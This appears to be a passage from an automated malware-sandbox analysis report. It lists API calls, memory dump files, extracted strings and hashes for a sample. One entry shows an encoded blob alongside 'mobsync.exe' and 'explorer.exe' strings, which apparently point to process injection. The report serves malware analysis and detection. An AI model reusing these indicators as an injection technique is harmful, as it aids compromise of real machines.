• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF686063473,?,?,FFFFFFFE,00007FF686063EB2), ref: 00007FF68606363E
Memory Dump Source
• Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
• Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp
• Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp
• Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp
• Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp
Similarity
• API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
• String ID:
• API String ID: 2210144848-0
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
• Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp
• Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp
• Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp
• Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp
Similarity
• API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task__std_exception_copy__std_exception_destroy
• String ID:
• API String ID: 1087005451-0
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
• Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp
• Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp
• Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp
• Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp
Similarity
• API ID: _set_statfp
• String ID:
• API String ID: 1156100317-0
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
• Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp
• Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp
• Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp
• Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp
Similarity
• API ID: _set_statfp
• String ID:
• API String ID: 1156100317-0
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
• Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp
• Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp
• Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp
• Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp
Similarity
• API ID: CallEncodePointerTranslator
• String ID: MOC$RCC
• API String ID: 3544855599-2084237596
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
• Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp
• Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp
• Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp
• Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp
Similarity
• API ID: CallEncodePointerTranslator
• String ID: MOC$RCC
• API String ID: 3544855599-2084237596
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
• Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp
• Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp
• Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp
• Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp
Similarity
• API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
• String ID: csm$csm
• API String ID: 3896166516-3733052814
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                                                      • String ID: bad locale name
                                                                                                                                                                      • API String ID: 2775327233-1405518554
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __except_validate_context_record
                                                                                                                                                                      • String ID: csm$csm
                                                                                                                                                                      • API String ID: 1467352782-3733052814
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3215553584-3916222277
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID: e+000$gfff
                                                                                                                                                                      • API String ID: 3215553584-3030954782
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateFrameInfo__except_validate_context_record
                                                                                                                                                                      • String ID: csm
                                                                                                                                                                      • API String ID: 2558813199-1018135373
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorFileLastWrite
                                                                                                                                                                      • String ID: U
                                                                                                                                                                      • API String ID: 442123175-4171548499
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _handle_errorf
                                                                                                                                                                      • String ID: "$powf
                                                                                                                                                                      • API String ID: 2315412904-603753351
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __std_exception_copy_invalid_parameter_noinfo_noreturn
                                                                                                                                                                      • String ID: ios_base::failbit set
                                                                                                                                                                      • API String ID: 1109970293-3924258884
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _handle_error
                                                                                                                                                                      • String ID: "$pow
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _set_errno_from_matherr
                                                                                                                                                                      • String ID: exp
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CompareStringtry_get_function
                                                                                                                                                                      • String ID: CompareStringEx
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Stringtry_get_function
                                                                                                                                                                      • String ID: LCMapStringEx
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_Yarn
                                                                                                                                                                      • String ID: bad locale name
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,00007FF6860485BE), ref: 00007FF68604BB58
                                                                                                                                                                      • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,00007FF6860485BE), ref: 00007FF68604BB9E
                                                                                                                                                                      Strings
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                      • String ID: csm
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DefaultUsertry_get_function
                                                                                                                                                                      • String ID: GetUserDefaultLocaleName
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF68605F045
                                                                                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,?,00007FF68605496C,?,?,?,?,?,?,?,?,00007FF686052177), ref: 00007FF68605F05F
                                                                                                                                                                      Strings
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                                                                                                                                      • String ID: InitializeCriticalSectionEx
                                                                                                                                                                      • API String ID: 539475747-3084827643
                                                                                                                                                                      • Opcode ID: 2cbb35288a37513c5ba61f5b238e96a2c6ce937cdb013f21624f9d819ca3875d
                                                                                                                                                                      • Instruction ID: aae078258e5af3096f9653c1e719707621a8c07a48b48406ad2244ade6242d3d
                                                                                                                                                                      • Opcode Fuzzy Hash: 2cbb35288a37513c5ba61f5b238e96a2c6ce937cdb013f21624f9d819ca3875d
                                                                                                                                                                      • Instruction Fuzzy Hash: 16F0BE21B08781C2FA049B51B6000A92361BF48B80F48913AEA5D93B55CE3EEC84CB08
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF68605EF01
                                                                                                                                                                      • TlsSetValue.KERNEL32(?,?,8000000000000000,00007FF68605AC42,?,?,8000000000000000,00007FF686056A2D,?,?,?,?,00007FF68605AE29), ref: 00007FF68605EF18
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Valuetry_get_function
                                                                                                                                                                      • String ID: FlsSetValue
                                                                                                                                                                      • API String ID: 738293619-3750699315
                                                                                                                                                                      • Opcode ID: 62cd9636d67e5ce5c82c1edbb01e06b21be09cd90d2af876ab34d084c39e020e
                                                                                                                                                                      • Instruction ID: e49996f0cca00da83c3c7cbbc186a88b00790503d943aa9179846048b66161af
                                                                                                                                                                      • Opcode Fuzzy Hash: 62cd9636d67e5ce5c82c1edbb01e06b21be09cd90d2af876ab34d084c39e020e
                                                                                                                                                                      • Instruction Fuzzy Hash: 76E09261A0C746D1FE084B64FA051B82232BF48780F88803EEA4D96395CE3FEC84C349
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Executed Functions

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Wcsftime$_invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4239037671-0
                                                                                                                                                                      • Opcode ID: b7cdc139778069345d05bc1a0203156a00a62fb54fc34efc2fb8fe5e1c560dcb
                                                                                                                                                                      • Instruction ID: 91f761fe59b34a07b3169087fc00b6ddb26b8aa10d7f68b649df058a46ec2cbd
                                                                                                                                                                      • Opcode Fuzzy Hash: b7cdc139778069345d05bc1a0203156a00a62fb54fc34efc2fb8fe5e1c560dcb
                                                                                                                                                                      • Instruction Fuzzy Hash: 31817072E04A5286EB60CEA6D48137D2B64FBE4B98F144636EE2E877D5EF3DD4418340
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionFilterUnhandled_invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 59578552-0
                                                                                                                                                                      • Opcode ID: 088d467cec947a303d1071b944324c29810d5aa90d0137deb7dd50eed9953ca4
                                                                                                                                                                      • Instruction ID: cc0305d158387963c21fae1729af9033facaa9a6397845e964804255764ac556
                                                                                                                                                                      • Opcode Fuzzy Hash: 088d467cec947a303d1071b944324c29810d5aa90d0137deb7dd50eed9953ca4
                                                                                                                                                                      • Instruction Fuzzy Hash: 5BE0BF20E5D14785EB29F7E7584217C18955FF5B20F50113AF23DC13C2ED2D25A29A22
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      • FBtx+cQ0wBf1QaR/F3NyW2buPGRwuoe8XWPJF+s/XkGNNyrUqBweCIM5LbxzHXsAWbL2LktkJjnllVbj6BGrqrqYneuqzN3tjTEBSUZlWEfQHxmm0HfxZ4W7xd7Etp7tjxqdtXY+9v/AmBnr+JWYRqKSraPDrzg/TJgshMz+ZokplO4ccfvRwhMziznOglinvB1lUmTLGC79cHnwg2VgF+aqLvG92DRJirkU5ivdR4L9Y6Gu44KypBugLL1iski5Vtdj, xrefs: 00007FF6FE103240
                                                                                                                                                                      • @, xrefs: 00007FF6FE103096
                                                                                                                                                                      • C:\Windows\System32\mobsync.exe, xrefs: 00007FF6FE10303C
                                                                                                                                                                      • explorer.exe, xrefs: 00007FF6FE102F76
                                                                                                                                                                      • R]7, xrefs: 00007FF6FE1033CB
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo_noreturn$Window$Concurrency::cancel_current_taskConsoleMitigationPolicyProcessShow
                                                                                                                                                                      • String ID: @$C:\Windows\System32\mobsync.exe$FBtx+cQ0wBf1QaR/F3NyW2buPGRwuoe8XWPJF+s/XkGNNyrUqBweCIM5LbxzHXsAWbL2LktkJjnllVbj6BGrqrqYneuqzN3tjTEBSUZlWEfQHxmm0HfxZ4W7xd7Etp7tjxqdtXY+9v/AmBnr+JWYRqKSraPDrzg/TJgshMz+ZokplO4ccfvRwhMziznOglinvB1lUmTLGC79cHnwg2VgF+aqLvG92DRJirkU5ivdR4L9Y6Gu44KypBugLL1iski5Vtdj$R]7$explorer.exe
                                                                                                                                                                      • API String ID: 4262344479-4185684469
                                                                                                                                                                      • Opcode ID: a468b3e6b28607d6e2ec463ba5eb1e3f63ae2e4094c7e7b9fc94da40cd4cfa08
                                                                                                                                                                      • Instruction ID: 6bdd6b1adf417b6e85c08c14fc6b68894a529aaa63869ce154c4c83036c2128b
                                                                                                                                                                      • Opcode Fuzzy Hash: a468b3e6b28607d6e2ec463ba5eb1e3f63ae2e4094c7e7b9fc94da40cd4cfa08
                                                                                                                                                                      • Instruction Fuzzy Hash: 7BE1BF62E18B8185EB20CB26D4443AD6B62FB95794F506235EBBD47BD9EF3CE190C700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                      • String ID: [!] PAUSE$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                      • API String ID: 2081738530-3229271104
                                                                                                                                                                      • Opcode ID: 4b47cfc8a2ab3d0877d47af7543c7d0808fcd3ae3f20c1146f8bb5cf32415501
                                                                                                                                                                      • Instruction ID: fdd7e9603e0371295c247d5ee9e10a79d8ba8f03d06db4b4e534a60490a15db0
                                                                                                                                                                      • Opcode Fuzzy Hash: 4b47cfc8a2ab3d0877d47af7543c7d0808fcd3ae3f20c1146f8bb5cf32415501
                                                                                                                                                                      • Instruction Fuzzy Hash: 70E16262E09A4182EB20CB16D4402796BA1FBE5B94F589132EB6E87BE5EF3DD551C300
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: std::_$Lockit$GetctypeLocinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                                                      • String ID: bad locale name
                                                                                                                                                                      • API String ID: 2967684691-1405518554
                                                                                                                                                                      • Opcode ID: 00c924be77ec5e6de29e7d77c401772db9bcaf2481e1327176cac6107a81c22f
                                                                                                                                                                      • Instruction ID: 34749645b75942cb3a78ad97ceb2459ef9672f99747515a90d2c4b9218400223
                                                                                                                                                                      • Opcode Fuzzy Hash: 00c924be77ec5e6de29e7d77c401772db9bcaf2481e1327176cac6107a81c22f
                                                                                                                                                                      • Instruction Fuzzy Hash: D8414722F0AB4189FB14DFA2D4502BC2BB8EFA4744F045435EF5DA6A96EE38D526D304
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __scrt_acquire_startup_lock__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3638128798-0
                                                                                                                                                                      • Opcode ID: 49bdca32bcec916e7f7748a8719e7af450ff2d19f91812179d5dd9a257b79687
                                                                                                                                                                      • Instruction ID: e2f6583717a9aefa50047533e0d8b9d7ed2316b08eb9bfbc2458b546a91c6d59
                                                                                                                                                                      • Opcode Fuzzy Hash: 49bdca32bcec916e7f7748a8719e7af450ff2d19f91812179d5dd9a257b79687
                                                                                                                                                                      • Instruction Fuzzy Hash: 0D312B21E0E24381FB54FB6394113B92A91AFF6784F446435F76E872D7FE2CA8688351
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1703294689-0
                                                                                                                                                                      • Opcode ID: 4a5a4178b89e75a6764050cf1db7e4da5d1539da0e5c1199342dfec5e059194f
                                                                                                                                                                      • Instruction ID: 7e5e3ddc293812f8445f76ea2cfbce7c3420e08e75303175dca7908b47221d45
                                                                                                                                                                      • Opcode Fuzzy Hash: 4a5a4178b89e75a6764050cf1db7e4da5d1539da0e5c1199342dfec5e059194f
                                                                                                                                                                      • Instruction Fuzzy Hash: ABE01A24F0430182EF54EB729C9537D2A56AFF5741F105538E92E863D2FD3EA489C302
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
